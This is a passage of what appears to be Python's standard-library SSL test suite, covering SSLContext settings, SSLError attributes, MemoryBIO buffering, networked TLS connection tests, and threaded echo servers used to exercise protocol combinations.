self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
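# ssl.MemoryBIO behaves as a plain FIFO byte buffer: write() appends,
# read(n) consumes, pending reports what is buffered, and eof only becomes
# true after write_eof() *and* the buffer has been drained.  Illustrative
# sketch (not part of the tests):
#
#     bio = ssl.MemoryBIO()
#     bio.write(b'hello')
#     assert bio.pending == 5
#     assert bio.read(2) == b'he'
#     bio.write_eof()
#     assert not bio.eof            # b'llo' is still buffered
#     assert bio.read() == b'llo'
#     assert bio.eof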
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
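# Swapping .context on a connected SSLSocket, as test_context_setget() does,
# is supported: the attribute changes on both the socket and the underlying
# _sslobj immediately, and the new context is what any later handshake work
# (e.g. renegotiation) will use.  Illustrative sketch; `ctx1`, `ctx2` and
# `host` are assumed names:
#
#     ss = ctx1.wrap_socket(socket.socket())
#     ss.connect((host, 443))
#     ss.context = ctx2             # future handshakes use ctx2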
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop: call func(*args) and, depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
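# ssl_io_loop() above is the canonical memory-BIO "pump": run one SSLObject
# operation, always flush whatever landed in the outgoing BIO to the socket,
# and on SSL_ERROR_WANT_READ feed socket bytes (or EOF) into the incoming BIO
# before retrying.  Hedged usage sketch; `ctx` and `host` are assumed names:
#
#     incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
#     sslobj = ctx.wrap_bio(incoming, outgoing, server_hostname=host)
#     # loop do_handshake() / read() / write() exactly as ssl_io_loop() does,
#     # shuttling bytes between the BIOs and whatever transport you own.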
def test_handshake(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(REMOTE_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, REMOTE_HOST)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# self-signed.pythontest.net probably shuts down the TCP
# connection without sending a secure shutdown message, and
# this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
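# ThreadedEchoServer is used throughout the threaded tests as a context
# manager: __enter__ starts the accept loop in a background thread and waits
# on an Event, __exit__ stops and joins it; each accepted connection gets its
# own ConnectionHandler thread, which also serves as the STARTTLS peer.
# Typical (illustrative) usage:
#
#     server = ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_TLSv1,
#                                 chatty=False)
#     with server:
#         with ssl.wrap_socket(socket.socket(),
#                              cert_reqs=ssl.CERT_NONE) as s:
#             s.connect((HOST, server.port))
#             s.sendall(b"hello\n")      # the server echoes it lower-cased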
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
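# server_params_test() returns a stats dict that the callers below inspect:
# the client-side keys are 'compression', 'cipher', 'peercert',
# 'client_alpn_protocol', 'client_npn_protocol' and 'version', plus the
# server-side lists 'server_alpn_protocols', 'server_npn_protocols' and
# 'server_shared_ciphers'.  Illustrative read of the result (hedged sketch;
# client_ctx/server_ctx are assumed contexts):
#
#     stats = server_params_test(client_ctx, server_ctx, sni_name='localhost')
#     assert stats['version'] in ('TLSv1', 'TLSv1.1', 'TLSv1.2')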
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
